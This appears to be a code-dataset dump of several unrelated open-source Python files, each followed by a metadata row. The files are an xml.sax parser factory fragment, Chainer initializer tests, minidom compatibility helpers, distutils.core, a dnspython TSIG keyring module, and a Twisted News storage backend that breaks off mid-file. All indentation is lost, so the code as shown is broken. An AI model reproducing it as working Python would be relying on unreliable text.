Creates the first parser it is able to instantiate of the ones
given in the list created by doing parser_list +
default_parser_list. The lists must contain the names of Python
modules containing both a SAX parser and a create_parser function."""
for parser_name in parser_list + default_parser_list:
try:
return _create_parser(parser_name)
except ImportError,e:
import sys
if sys.modules.has_key(parser_name):
# The parser module was found, but importing it
# failed unexpectedly, pass this exception through
raise
except SAXReaderNotAvailable:
# The parser module detected that it won't work properly,
# so try the next one
pass
raise SAXReaderNotAvailable("No parsers found", None)
# --- Internal utility methods used by make_parser
def _create_parser(parser_name):
drv_module = __import__(parser_name,{},{},['create_parser'])
return drv_module.create_parser()
del sys
| apache-2.0 | -6,603,923,085,846,985,000 | 5,238,758,412,420,869,000 | 32.460784 | 82 | 0.696455 | false |
keisuke-umezawa/chainer | tests/chainer_tests/initializer_tests/test_constant.py | 4 | 3718 | import unittest
from chainer import backend
from chainer.backends import cuda
from chainer import initializers
from chainer import testing
from chainer.testing import attr
import numpy
@testing.parameterize(*testing.product({
'dtype': [numpy.float16, numpy.float32, numpy.float64],
}))
class TestIdentity(unittest.TestCase):
scale = 0.1
shape = (2, 2)
def setUp(self):
self.check_options = {}
if self.dtype == numpy.float16:
self.check_options = {'atol': 1e-4, 'rtol': 1e-3}
def check_initializer(self, w):
initializer = initializers.Identity(scale=self.scale)
initializer(w)
testing.assert_allclose(
w, self.scale * numpy.identity(len(self.shape)),
**self.check_options)
def test_initializer_cpu(self):
w = numpy.empty(self.shape, dtype=self.dtype)
self.check_initializer(w)
@attr.gpu
def test_initializer_gpu(self):
w = cuda.cupy.empty(self.shape, dtype=self.dtype)
self.check_initializer(w)
def check_shaped_initializer(self, xp):
initializer = initializers.Identity(
scale=self.scale, dtype=self.dtype)
w = initializers.generate_array(initializer, self.shape, xp)
self.assertIs(backend.get_array_module(w), xp)
self.assertTupleEqual(w.shape, self.shape)
self.assertEqual(w.dtype, self.dtype)
testing.assert_allclose(
w, self.scale * numpy.identity(len(self.shape)),
**self.check_options)
def test_shaped_initializer_cpu(self):
self.check_shaped_initializer(numpy)
@attr.gpu
def test_shaped_initializer_gpu(self):
self.check_shaped_initializer(cuda.cupy)
@testing.parameterize(
{'shape': (2, 3)},
{'shape': (2, 2, 4)},
{'shape': ()},
{'shape': 0})
class TestIdentityInvalid(unittest.TestCase):
def setUp(self):
self.initializer = initializers.Identity()
def test_invalid_shape(self):
w = numpy.empty(self.shape, dtype=numpy.float32)
with self.assertRaises(ValueError):
self.initializer(w)
@testing.parameterize(*testing.product({
'dtype': [numpy.float16, numpy.float32, numpy.float64],
}))
class TestConstant(unittest.TestCase):
fill_value = 0.1
shape = (2, 3)
def setUp(self):
self.check_options = {}
if self.dtype == numpy.float16:
self.check_options = {'atol': 1e-4, 'rtol': 1e-3}
def check_initializer(self, w):
initializer = initializers.Constant(fill_value=self.fill_value)
initializer(w)
testing.assert_allclose(
w, numpy.full(self.shape, self.fill_value),
**self.check_options)
def test_initializer_cpu(self):
w = numpy.empty(self.shape, dtype=self.dtype)
self.check_initializer(w)
@attr.gpu
def test_initializer_gpu(self):
w = cuda.cupy.empty(self.shape, dtype=self.dtype)
self.check_initializer(w)
def check_shaped_initializer(self, xp):
initializer = initializers.Constant(
fill_value=self.fill_value, dtype=self.dtype)
w = initializers.generate_array(initializer, self.shape, xp)
self.assertIs(backend.get_array_module(w), xp)
self.assertTupleEqual(w.shape, self.shape)
self.assertEqual(w.dtype, self.dtype)
testing.assert_allclose(
w, numpy.full(self.shape, self.fill_value),
**self.check_options)
def test_shaped_initializer_cpu(self):
self.check_shaped_initializer(numpy)
@attr.gpu
def test_shaped_initializer_gpu(self):
self.check_shaped_initializer(cuda.cupy)
testing.run_module(__name__, __file__)
| mit | 5,577,818,868,722,510,000 | 3,836,712,344,619,273,000 | 29.227642 | 71 | 0.638784 | false |
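
The tests above exercise the Identity and Constant initializers both by filling a pre-allocated array in place and through initializers.generate_array. A hedged sketch of the same pattern outside the test harness; the shapes and values are arbitrary.

# Illustrative sketch mirroring the usage exercised by the tests above.
import numpy
from chainer import initializers

w = numpy.empty((3, 3), dtype=numpy.float32)
initializers.Identity(scale=0.1)(w)        # fills w with 0.1 * identity in place

c = initializers.generate_array(
    initializers.Constant(fill_value=0.5, dtype=numpy.float32), (2, 3), numpy)
# c is a newly allocated (2, 3) float32 array filled with 0.5
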
jlspyaozhongkai/Uter | third_party_backup/Python-2.7.9/Lib/xml/dom/minicompat.py | 209 | 3330 | """Python version compatibility support for minidom."""
# This module should only be imported using "import *".
#
# The following names are defined:
#
# NodeList -- lightest possible NodeList implementation
#
# EmptyNodeList -- lightest possible NodeList that is guaranteed to
# remain empty (immutable)
#
# StringTypes -- tuple of defined string types
#
# defproperty -- function used in conjunction with GetattrMagic;
# using these together is needed to make them work
# as efficiently as possible in both Python 2.2+
# and older versions. For example:
#
# class MyClass(GetattrMagic):
# def _get_myattr(self):
# return something
#
# defproperty(MyClass, "myattr",
# "return some value")
#
# For Python 2.2 and newer, this will construct a
# property object on the class, which avoids
# needing to override __getattr__(). It will only
# work for read-only attributes.
#
# For older versions of Python, inheriting from
# GetattrMagic will use the traditional
# __getattr__() hackery to achieve the same effect,
# but less efficiently.
#
# defproperty() should be used for each version of
# the relevant _get_<property>() function.
__all__ = ["NodeList", "EmptyNodeList", "StringTypes", "defproperty"]
import xml.dom
try:
unicode
except NameError:
StringTypes = type(''),
else:
StringTypes = type(''), type(unicode(''))
class NodeList(list):
__slots__ = ()
def item(self, index):
if 0 <= index < len(self):
return self[index]
def _get_length(self):
return len(self)
def _set_length(self, value):
raise xml.dom.NoModificationAllowedErr(
"attempt to modify read-only attribute 'length'")
length = property(_get_length, _set_length,
doc="The number of nodes in the NodeList.")
def __getstate__(self):
return list(self)
def __setstate__(self, state):
self[:] = state
class EmptyNodeList(tuple):
__slots__ = ()
def __add__(self, other):
NL = NodeList()
NL.extend(other)
return NL
def __radd__(self, other):
NL = NodeList()
NL.extend(other)
return NL
def item(self, index):
return None
def _get_length(self):
return 0
def _set_length(self, value):
raise xml.dom.NoModificationAllowedErr(
"attempt to modify read-only attribute 'length'")
length = property(_get_length, _set_length,
doc="The number of nodes in the NodeList.")
def defproperty(klass, name, doc):
get = getattr(klass, ("_get_" + name)).im_func
def set(self, value, name=name):
raise xml.dom.NoModificationAllowedErr(
"attempt to modify read-only attribute " + repr(name))
assert not hasattr(klass, "_set_" + name), \
"expected not to find _set_" + name
prop = property(get, set, doc=doc)
setattr(klass, name, prop)
| gpl-3.0 | -4,882,778,350,645,545,000 | 7,389,239,377,419,569,000 | 29.272727 | 70 | 0.558258 | false |
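
defproperty() above turns a _get_<name> method into a read-only property, exactly as described in the module comments. A minimal illustrative example of that pattern; the class and attribute names are made up.

# Illustrative sketch of the defproperty() pattern documented above (Python 2).
from xml.dom.minicompat import defproperty

class Fruit(object):
    def _get_color(self):
        return "red"

defproperty(Fruit, "color", doc="Colour of the fruit (read-only).")

f = Fruit()
print(f.color)       # -> 'red'
# Assigning f.color = 'green' raises xml.dom.NoModificationAllowedErr
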
zhjunlang/kbengine | kbe/res/scripts/common/Lib/distutils/core.py | 80 | 8909 | """distutils.core
The only module that needs to be imported to use the Distutils; provides
the 'setup' function (which is to be called from the setup script). Also
indirectly provides the Distribution and Command classes, although they are
really defined in distutils.dist and distutils.cmd.
"""
import os
import sys
from distutils.debug import DEBUG
from distutils.errors import *
# Mainly import these so setup scripts can "from distutils.core import" them.
from distutils.dist import Distribution
from distutils.cmd import Command
from distutils.config import PyPIRCCommand
from distutils.extension import Extension
# This is a barebones help message generated displayed when the user
# runs the setup script with no arguments at all. More useful help
# is generated with various --help options: global help, list commands,
# and per-command help.
USAGE = """\
usage: %(script)s [global_opts] cmd1 [cmd1_opts] [cmd2 [cmd2_opts] ...]
or: %(script)s --help [cmd1 cmd2 ...]
or: %(script)s --help-commands
or: %(script)s cmd --help
"""
def gen_usage (script_name):
script = os.path.basename(script_name)
return USAGE % vars()
# Some mild magic to control the behaviour of 'setup()' from 'run_setup()'.
_setup_stop_after = None
_setup_distribution = None
# Legal keyword arguments for the setup() function
setup_keywords = ('distclass', 'script_name', 'script_args', 'options',
'name', 'version', 'author', 'author_email',
'maintainer', 'maintainer_email', 'url', 'license',
'description', 'long_description', 'keywords',
'platforms', 'classifiers', 'download_url',
'requires', 'provides', 'obsoletes',
)
# Legal keyword arguments for the Extension constructor
extension_keywords = ('name', 'sources', 'include_dirs',
'define_macros', 'undef_macros',
'library_dirs', 'libraries', 'runtime_library_dirs',
'extra_objects', 'extra_compile_args', 'extra_link_args',
'swig_opts', 'export_symbols', 'depends', 'language')
def setup (**attrs):
"""The gateway to the Distutils: do everything your setup script needs
to do, in a highly flexible and user-driven way. Briefly: create a
Distribution instance; find and parse config files; parse the command
line; run each Distutils command found there, customized by the options
supplied to 'setup()' (as keyword arguments), in config files, and on
the command line.
The Distribution instance might be an instance of a class supplied via
the 'distclass' keyword argument to 'setup'; if no such class is
supplied, then the Distribution class (in dist.py) is instantiated.
All other arguments to 'setup' (except for 'cmdclass') are used to set
attributes of the Distribution instance.
The 'cmdclass' argument, if supplied, is a dictionary mapping command
names to command classes. Each command encountered on the command line
will be turned into a command class, which is in turn instantiated; any
class found in 'cmdclass' is used in place of the default, which is
(for command 'foo_bar') class 'foo_bar' in module
'distutils.command.foo_bar'. The command class must provide a
'user_options' attribute which is a list of option specifiers for
'distutils.fancy_getopt'. Any command-line options between the current
and the next command are used to set attributes of the current command
object.
When the entire command-line has been successfully parsed, calls the
'run()' method on each command object in turn. This method will be
driven entirely by the Distribution object (which each command object
has a reference to, thanks to its constructor), and the
command-specific options that became attributes of each command
object.
"""
global _setup_stop_after, _setup_distribution
# Determine the distribution class -- either caller-supplied or
# our Distribution (see below).
klass = attrs.get('distclass')
if klass:
del attrs['distclass']
else:
klass = Distribution
if 'script_name' not in attrs:
attrs['script_name'] = os.path.basename(sys.argv[0])
if 'script_args' not in attrs:
attrs['script_args'] = sys.argv[1:]
# Create the Distribution instance, using the remaining arguments
# (ie. everything except distclass) to initialize it
try:
_setup_distribution = dist = klass(attrs)
except DistutilsSetupError as msg:
if 'name' not in attrs:
raise SystemExit("error in setup command: %s" % msg)
else:
raise SystemExit("error in %s setup command: %s" % \
(attrs['name'], msg))
if _setup_stop_after == "init":
return dist
# Find and parse the config file(s): they will override options from
# the setup script, but be overridden by the command line.
dist.parse_config_files()
if DEBUG:
print("options (after parsing config files):")
dist.dump_option_dicts()
if _setup_stop_after == "config":
return dist
# Parse the command line and override config files; any
# command-line errors are the end user's fault, so turn them into
# SystemExit to suppress tracebacks.
try:
ok = dist.parse_command_line()
except DistutilsArgError as msg:
raise SystemExit(gen_usage(dist.script_name) + "\nerror: %s" % msg)
if DEBUG:
print("options (after parsing command line):")
dist.dump_option_dicts()
if _setup_stop_after == "commandline":
return dist
# And finally, run all the commands found on the command line.
if ok:
try:
dist.run_commands()
except KeyboardInterrupt:
raise SystemExit("interrupted")
except OSError as exc:
if DEBUG:
sys.stderr.write("error: %s\n" % (exc,))
raise
else:
raise SystemExit("error: %s" % (exc,))
except (DistutilsError,
CCompilerError) as msg:
if DEBUG:
raise
else:
raise SystemExit("error: " + str(msg))
return dist
# setup ()
def run_setup (script_name, script_args=None, stop_after="run"):
"""Run a setup script in a somewhat controlled environment, and
return the Distribution instance that drives things. This is useful
if you need to find out the distribution meta-data (passed as
keyword args from 'script' to 'setup()', or the contents of the
config files or command-line.
'script_name' is a file that will be read and run with 'exec()';
'sys.argv[0]' will be replaced with 'script' for the duration of the
call. 'script_args' is a list of strings; if supplied,
'sys.argv[1:]' will be replaced by 'script_args' for the duration of
the call.
'stop_after' tells 'setup()' when to stop processing; possible
values:
init
stop after the Distribution instance has been created and
populated with the keyword arguments to 'setup()'
config
stop after config files have been parsed (and their data
stored in the Distribution instance)
commandline
stop after the command-line ('sys.argv[1:]' or 'script_args')
have been parsed (and the data stored in the Distribution)
run [default]
stop after all commands have been run (the same as if 'setup()'
      had been called in the usual way)
Returns the Distribution instance, which provides all information
used to drive the Distutils.
"""
if stop_after not in ('init', 'config', 'commandline', 'run'):
raise ValueError("invalid value for 'stop_after': %r" % (stop_after,))
global _setup_stop_after, _setup_distribution
_setup_stop_after = stop_after
save_argv = sys.argv
g = {'__file__': script_name}
l = {}
try:
try:
sys.argv[0] = script_name
if script_args is not None:
sys.argv[1:] = script_args
with open(script_name, 'rb') as f:
exec(f.read(), g, l)
finally:
sys.argv = save_argv
_setup_stop_after = None
except SystemExit:
# Hmm, should we do something if exiting with a non-zero code
# (ie. error)?
pass
except:
raise
if _setup_distribution is None:
raise RuntimeError(("'distutils.core.setup()' was never called -- "
"perhaps '%s' is not a Distutils setup script?") % \
script_name)
# I wonder if the setup script's namespace -- g and l -- would be of
# any interest to callers?
#print "_setup_distribution:", _setup_distribution
return _setup_distribution
# run_setup ()
| lgpl-3.0 | -5,788,361,553,645,367,000 | -2,178,444,165,739,443,500 | 36.590717 | 79 | 0.645078 | false |
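
setup() and run_setup() above are the two public entry points of the module. A hedged sketch of a minimal setup script and of introspecting it without running any commands; the project metadata is made up.

# Illustrative sketch; package name, version and module are placeholders.
# --- setup.py ---
from distutils.core import setup

setup(name='example-pkg',
      version='0.1',
      author='Jane Doe',
      py_modules=['example'])

# --- elsewhere: load the script but stop before any command runs ---
from distutils.core import run_setup

dist = run_setup('setup.py', stop_after='init')
print('%s %s' % (dist.get_name(), dist.get_version()))   # example-pkg 0.1
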
skuarch/namebench | nb_third_party/dns/tsigkeyring.py | 248 | 1658 | # Copyright (C) 2003-2007, 2009, 2010 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""A place to store TSIG keys."""
import base64
import dns.name
def from_text(textring):
"""Convert a dictionary containing (textual DNS name, base64 secret) pairs
into a binary keyring which has (dns.name.Name, binary secret) pairs.
@rtype: dict"""
keyring = {}
for keytext in textring:
keyname = dns.name.from_text(keytext)
secret = base64.decodestring(textring[keytext])
keyring[keyname] = secret
return keyring
def to_text(keyring):
"""Convert a dictionary containing (dns.name.Name, binary secret) pairs
into a text keyring which has (textual DNS name, base64 secret) pairs.
@rtype: dict"""
textring = {}
for keyname in keyring:
keytext = dns.name.to_text(keyname)
secret = base64.encodestring(keyring[keyname])
textring[keytext] = secret
return textring
| apache-2.0 | 8,549,442,347,209,745,000 | 1,712,266,188,436,656,600 | 36.681818 | 78 | 0.720748 | false |
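
from_text() and to_text() above convert between the textual form of a TSIG keyring and the binary form used internally. A hedged round-trip sketch; the key name and base64 secret are placeholders.

# Illustrative sketch; key name and secret below are made-up placeholders.
import dns.tsigkeyring

text_ring = {'keyname.example.': 'pRP5FaPa2iynPMqwtvee2w=='}
keyring = dns.tsigkeyring.from_text(text_ring)   # dns.name.Name -> raw secret bytes
back = dns.tsigkeyring.to_text(keyring)          # back to textual names / base64
# A binary keyring like this is what dnspython's query and update helpers
# accept through their keyring argument for TSIG signing.
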
kemalakyol48/python-for-android | python-modules/twisted/twisted/news/database.py | 49 | 33743 | # -*- test-case-name: twisted.news.test -*-
# Copyright (c) 2001-2010 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
News server backend implementations.
"""
import getpass, pickle, time, socket
import os
import StringIO
from email.Message import Message
from email.Generator import Generator
from zope.interface import implements, Interface
from twisted.news.nntp import NNTPError
from twisted.mail import smtp
from twisted.internet import defer
from twisted.enterprise import adbapi
from twisted.persisted import dirdbm
from twisted.python.hashlib import md5
ERR_NOGROUP, ERR_NOARTICLE = range(2, 4) # XXX - put NNTP values here (I guess?)
OVERVIEW_FMT = [
'Subject', 'From', 'Date', 'Message-ID', 'References',
'Bytes', 'Lines', 'Xref'
]
def hexdigest(md5): #XXX: argh. 1.5.2 doesn't have this.
return ''.join(map(lambda x: hex(ord(x))[2:], md5.digest()))
class Article:
def __init__(self, head, body):
self.body = body
self.headers = {}
header = None
for line in head.split('\r\n'):
if line[0] in ' \t':
i = list(self.headers[header])
i[1] += '\r\n' + line
else:
i = line.split(': ', 1)
header = i[0].lower()
self.headers[header] = tuple(i)
if not self.getHeader('Message-ID'):
s = str(time.time()) + self.body
id = hexdigest(md5(s)) + '@' + socket.gethostname()
self.putHeader('Message-ID', '<%s>' % id)
if not self.getHeader('Bytes'):
self.putHeader('Bytes', str(len(self.body)))
if not self.getHeader('Lines'):
self.putHeader('Lines', str(self.body.count('\n')))
if not self.getHeader('Date'):
self.putHeader('Date', time.ctime(time.time()))
def getHeader(self, header):
h = header.lower()
if self.headers.has_key(h):
return self.headers[h][1]
else:
return ''
def putHeader(self, header, value):
self.headers[header.lower()] = (header, value)
def textHeaders(self):
headers = []
for i in self.headers.values():
headers.append('%s: %s' % i)
return '\r\n'.join(headers) + '\r\n'
def overview(self):
xover = []
for i in OVERVIEW_FMT:
xover.append(self.getHeader(i))
return xover
class NewsServerError(Exception):
pass
class INewsStorage(Interface):
"""
An interface for storing and requesting news articles
"""
def listRequest():
"""
Returns a deferred whose callback will be passed a list of 4-tuples
containing (name, max index, min index, flags) for each news group
"""
def subscriptionRequest():
"""
Returns a deferred whose callback will be passed the list of
recommended subscription groups for new server users
"""
def postRequest(message):
"""
Returns a deferred whose callback will be invoked if 'message'
is successfully posted to one or more specified groups and
whose errback will be invoked otherwise.
"""
def overviewRequest():
"""
        Returns a deferred whose callback will be passed a list of
headers describing this server's overview format.
"""
def xoverRequest(group, low, high):
"""
Returns a deferred whose callback will be passed a list of xover
headers for the given group over the given range. If low is None,
the range starts at the first article. If high is None, the range
ends at the last article.
"""
def xhdrRequest(group, low, high, header):
"""
Returns a deferred whose callback will be passed a list of XHDR data
for the given group over the given range. If low is None,
the range starts at the first article. If high is None, the range
ends at the last article.
"""
def listGroupRequest(group):
"""
Returns a deferred whose callback will be passed a two-tuple of
(group name, [article indices])
"""
def groupRequest(group):
"""
Returns a deferred whose callback will be passed a five-tuple of
(group name, article count, highest index, lowest index, group flags)
"""
def articleExistsRequest(id):
"""
Returns a deferred whose callback will be passed with a true value
if a message with the specified Message-ID exists in the database
and with a false value otherwise.
"""
def articleRequest(group, index, id = None):
"""
Returns a deferred whose callback will be passed a file-like object
containing the full article text (headers and body) for the article
of the specified index in the specified group, and whose errback
will be invoked if the article or group does not exist. If id is
not None, index is ignored and the article with the given Message-ID
will be returned instead, along with its index in the specified
group.
"""
def headRequest(group, index):
"""
Returns a deferred whose callback will be passed the header for
the article of the specified index in the specified group, and
whose errback will be invoked if the article or group does not
exist.
"""
def bodyRequest(group, index):
"""
Returns a deferred whose callback will be passed the body for
the article of the specified index in the specified group, and
whose errback will be invoked if the article or group does not
exist.
"""
class NewsStorage:
"""
Backwards compatibility class -- There is no reason to inherit from this,
just implement INewsStorage instead.
"""
def listRequest(self):
raise NotImplementedError()
def subscriptionRequest(self):
raise NotImplementedError()
def postRequest(self, message):
raise NotImplementedError()
def overviewRequest(self):
return defer.succeed(OVERVIEW_FMT)
def xoverRequest(self, group, low, high):
raise NotImplementedError()
def xhdrRequest(self, group, low, high, header):
raise NotImplementedError()
def listGroupRequest(self, group):
raise NotImplementedError()
def groupRequest(self, group):
raise NotImplementedError()
def articleExistsRequest(self, id):
raise NotImplementedError()
def articleRequest(self, group, index, id = None):
raise NotImplementedError()
def headRequest(self, group, index):
raise NotImplementedError()
def bodyRequest(self, group, index):
raise NotImplementedError()
class _ModerationMixin:
"""
Storage implementations can inherit from this class to get the easy-to-use
C{notifyModerators} method which will take care of sending messages which
require moderation to a list of moderators.
"""
sendmail = staticmethod(smtp.sendmail)
def notifyModerators(self, moderators, article):
"""
Send an article to a list of group moderators to be moderated.
@param moderators: A C{list} of C{str} giving RFC 2821 addresses of
group moderators to notify.
@param article: The article requiring moderation.
@type article: L{Article}
@return: A L{Deferred} which fires with the result of sending the email.
"""
# Moderated postings go through as long as they have an Approved
# header, regardless of what the value is
group = article.getHeader('Newsgroups')
subject = article.getHeader('Subject')
if self._sender is None:
# This case should really go away. This isn't a good default.
sender = 'twisted-news@' + socket.gethostname()
else:
sender = self._sender
msg = Message()
msg['Message-ID'] = smtp.messageid()
msg['From'] = sender
msg['To'] = ', '.join(moderators)
msg['Subject'] = 'Moderate new %s message: %s' % (group, subject)
msg['Content-Type'] = 'message/rfc822'
payload = Message()
for header, value in article.headers.values():
payload.add_header(header, value)
payload.set_payload(article.body)
msg.attach(payload)
out = StringIO.StringIO()
gen = Generator(out, False)
gen.flatten(msg)
msg = out.getvalue()
return self.sendmail(self._mailhost, sender, moderators, msg)
class PickleStorage(_ModerationMixin):
"""
A trivial NewsStorage implementation using pickles
Contains numerous flaws and is generally unsuitable for any
real applications. Consider yourself warned!
"""
implements(INewsStorage)
sharedDBs = {}
def __init__(self, filename, groups=None, moderators=(),
mailhost=None, sender=None):
"""
@param mailhost: A C{str} giving the mail exchange host which will
accept moderation emails from this server. Must accept emails
destined for any address specified as a moderator.
@param sender: A C{str} giving the address which will be used as the
sender of any moderation email generated by this server.
"""
self.datafile = filename
self.load(filename, groups, moderators)
self._mailhost = mailhost
self._sender = sender
def getModerators(self, groups):
# first see if any groups are moderated. if so, nothing gets posted,
# but the whole messages gets forwarded to the moderator address
moderators = []
for group in groups:
moderators.extend(self.db['moderators'].get(group, None))
return filter(None, moderators)
def listRequest(self):
"Returns a list of 4-tuples: (name, max index, min index, flags)"
l = self.db['groups']
r = []
for i in l:
if len(self.db[i].keys()):
low = min(self.db[i].keys())
high = max(self.db[i].keys()) + 1
else:
low = high = 0
if self.db['moderators'].has_key(i):
flags = 'm'
else:
flags = 'y'
r.append((i, high, low, flags))
return defer.succeed(r)
def subscriptionRequest(self):
return defer.succeed(['alt.test'])
def postRequest(self, message):
cleave = message.find('\r\n\r\n')
headers, article = message[:cleave], message[cleave + 4:]
a = Article(headers, article)
groups = a.getHeader('Newsgroups').split()
xref = []
# Check moderated status
moderators = self.getModerators(groups)
if moderators and not a.getHeader('Approved'):
return self.notifyModerators(moderators, a)
for group in groups:
if self.db.has_key(group):
if len(self.db[group].keys()):
index = max(self.db[group].keys()) + 1
else:
index = 1
xref.append((group, str(index)))
self.db[group][index] = a
if len(xref) == 0:
return defer.fail(None)
a.putHeader('Xref', '%s %s' % (
socket.gethostname().split()[0],
''.join(map(lambda x: ':'.join(x), xref))
))
self.flush()
return defer.succeed(None)
def overviewRequest(self):
return defer.succeed(OVERVIEW_FMT)
def xoverRequest(self, group, low, high):
if not self.db.has_key(group):
return defer.succeed([])
r = []
for i in self.db[group].keys():
if (low is None or i >= low) and (high is None or i <= high):
r.append([str(i)] + self.db[group][i].overview())
return defer.succeed(r)
def xhdrRequest(self, group, low, high, header):
if not self.db.has_key(group):
return defer.succeed([])
r = []
for i in self.db[group].keys():
if low is None or i >= low and high is None or i <= high:
r.append((i, self.db[group][i].getHeader(header)))
return defer.succeed(r)
def listGroupRequest(self, group):
if self.db.has_key(group):
return defer.succeed((group, self.db[group].keys()))
else:
return defer.fail(None)
def groupRequest(self, group):
if self.db.has_key(group):
if len(self.db[group].keys()):
num = len(self.db[group].keys())
low = min(self.db[group].keys())
high = max(self.db[group].keys())
else:
num = low = high = 0
flags = 'y'
return defer.succeed((group, num, high, low, flags))
else:
return defer.fail(ERR_NOGROUP)
def articleExistsRequest(self, id):
for group in self.db['groups']:
for a in self.db[group].values():
if a.getHeader('Message-ID') == id:
return defer.succeed(1)
return defer.succeed(0)
def articleRequest(self, group, index, id = None):
if id is not None:
raise NotImplementedError
if self.db.has_key(group):
if self.db[group].has_key(index):
a = self.db[group][index]
return defer.succeed((
index,
a.getHeader('Message-ID'),
StringIO.StringIO(a.textHeaders() + '\r\n' + a.body)
))
else:
return defer.fail(ERR_NOARTICLE)
else:
return defer.fail(ERR_NOGROUP)
def headRequest(self, group, index):
if self.db.has_key(group):
if self.db[group].has_key(index):
a = self.db[group][index]
return defer.succeed((index, a.getHeader('Message-ID'), a.textHeaders()))
else:
return defer.fail(ERR_NOARTICLE)
else:
return defer.fail(ERR_NOGROUP)
def bodyRequest(self, group, index):
if self.db.has_key(group):
if self.db[group].has_key(index):
a = self.db[group][index]
return defer.succeed((index, a.getHeader('Message-ID'), StringIO.StringIO(a.body)))
else:
return defer.fail(ERR_NOARTICLE)
else:
return defer.fail(ERR_NOGROUP)
def flush(self):
f = open(self.datafile, 'w')
pickle.dump(self.db, f)
f.close()
def load(self, filename, groups = None, moderators = ()):
if PickleStorage.sharedDBs.has_key(filename):
self.db = PickleStorage.sharedDBs[filename]
else:
try:
self.db = pickle.load(open(filename))
PickleStorage.sharedDBs[filename] = self.db
except IOError:
self.db = PickleStorage.sharedDBs[filename] = {}
self.db['groups'] = groups
if groups is not None:
for i in groups:
self.db[i] = {}
self.db['moderators'] = dict(moderators)
self.flush()
class Group:
name = None
flags = ''
minArticle = 1
maxArticle = 0
articles = None
def __init__(self, name, flags = 'y'):
self.name = name
self.flags = flags
self.articles = {}
class NewsShelf(_ModerationMixin):
"""
A NewStorage implementation using Twisted's dirdbm persistence module.
"""
implements(INewsStorage)
def __init__(self, mailhost, path, sender=None):
"""
@param mailhost: A C{str} giving the mail exchange host which will
accept moderation emails from this server. Must accept emails
destined for any address specified as a moderator.
@param sender: A C{str} giving the address which will be used as the
sender of any moderation email generated by this server.
"""
self.path = path
self._mailhost = self.mailhost = mailhost
self._sender = sender
if not os.path.exists(path):
os.mkdir(path)
self.dbm = dirdbm.Shelf(os.path.join(path, "newsshelf"))
if not len(self.dbm.keys()):
self.initialize()
def initialize(self):
# A dictionary of group name/Group instance items
self.dbm['groups'] = dirdbm.Shelf(os.path.join(self.path, 'groups'))
# A dictionary of group name/email address
self.dbm['moderators'] = dirdbm.Shelf(os.path.join(self.path, 'moderators'))
# A list of group names
self.dbm['subscriptions'] = []
# A dictionary of MessageID strings/xref lists
self.dbm['Message-IDs'] = dirdbm.Shelf(os.path.join(self.path, 'Message-IDs'))
def addGroup(self, name, flags):
self.dbm['groups'][name] = Group(name, flags)
def addSubscription(self, name):
self.dbm['subscriptions'] = self.dbm['subscriptions'] + [name]
def addModerator(self, group, email):
self.dbm['moderators'][group] = email
def listRequest(self):
result = []
for g in self.dbm['groups'].values():
result.append((g.name, g.maxArticle, g.minArticle, g.flags))
return defer.succeed(result)
def subscriptionRequest(self):
return defer.succeed(self.dbm['subscriptions'])
def getModerator(self, groups):
# first see if any groups are moderated. if so, nothing gets posted,
# but the whole messages gets forwarded to the moderator address
for group in groups:
try:
return self.dbm['moderators'][group]
except KeyError:
pass
return None
def notifyModerator(self, moderator, article):
"""
Notify a single moderator about an article requiring moderation.
C{notifyModerators} should be preferred.
"""
return self.notifyModerators([moderator], article)
def postRequest(self, message):
cleave = message.find('\r\n\r\n')
headers, article = message[:cleave], message[cleave + 4:]
article = Article(headers, article)
groups = article.getHeader('Newsgroups').split()
xref = []
# Check for moderated status
moderator = self.getModerator(groups)
if moderator and not article.getHeader('Approved'):
return self.notifyModerators([moderator], article)
for group in groups:
try:
g = self.dbm['groups'][group]
except KeyError:
pass
else:
index = g.maxArticle + 1
g.maxArticle += 1
g.articles[index] = article
xref.append((group, str(index)))
self.dbm['groups'][group] = g
if not xref:
return defer.fail(NewsServerError("No groups carried: " + ' '.join(groups)))
article.putHeader('Xref', '%s %s' % (socket.gethostname().split()[0], ' '.join(map(lambda x: ':'.join(x), xref))))
self.dbm['Message-IDs'][article.getHeader('Message-ID')] = xref
return defer.succeed(None)
def overviewRequest(self):
return defer.succeed(OVERVIEW_FMT)
def xoverRequest(self, group, low, high):
if not self.dbm['groups'].has_key(group):
return defer.succeed([])
if low is None:
low = 0
if high is None:
high = self.dbm['groups'][group].maxArticle
r = []
for i in range(low, high + 1):
if self.dbm['groups'][group].articles.has_key(i):
r.append([str(i)] + self.dbm['groups'][group].articles[i].overview())
return defer.succeed(r)
def xhdrRequest(self, group, low, high, header):
if group not in self.dbm['groups']:
return defer.succeed([])
if low is None:
low = 0
if high is None:
high = self.dbm['groups'][group].maxArticle
r = []
for i in range(low, high + 1):
if self.dbm['groups'][group].articles.has_key(i):
r.append((i, self.dbm['groups'][group].articles[i].getHeader(header)))
return defer.succeed(r)
def listGroupRequest(self, group):
if self.dbm['groups'].has_key(group):
return defer.succeed((group, self.dbm['groups'][group].articles.keys()))
return defer.fail(NewsServerError("No such group: " + group))
def groupRequest(self, group):
try:
g = self.dbm['groups'][group]
except KeyError:
return defer.fail(NewsServerError("No such group: " + group))
else:
flags = g.flags
low = g.minArticle
high = g.maxArticle
num = high - low + 1
return defer.succeed((group, num, high, low, flags))
def articleExistsRequest(self, id):
return defer.succeed(id in self.dbm['Message-IDs'])
def articleRequest(self, group, index, id = None):
if id is not None:
try:
xref = self.dbm['Message-IDs'][id]
except KeyError:
return defer.fail(NewsServerError("No such article: " + id))
else:
group, index = xref[0]
index = int(index)
try:
a = self.dbm['groups'][group].articles[index]
except KeyError:
return defer.fail(NewsServerError("No such group: " + group))
else:
return defer.succeed((
index,
a.getHeader('Message-ID'),
StringIO.StringIO(a.textHeaders() + '\r\n' + a.body)
))
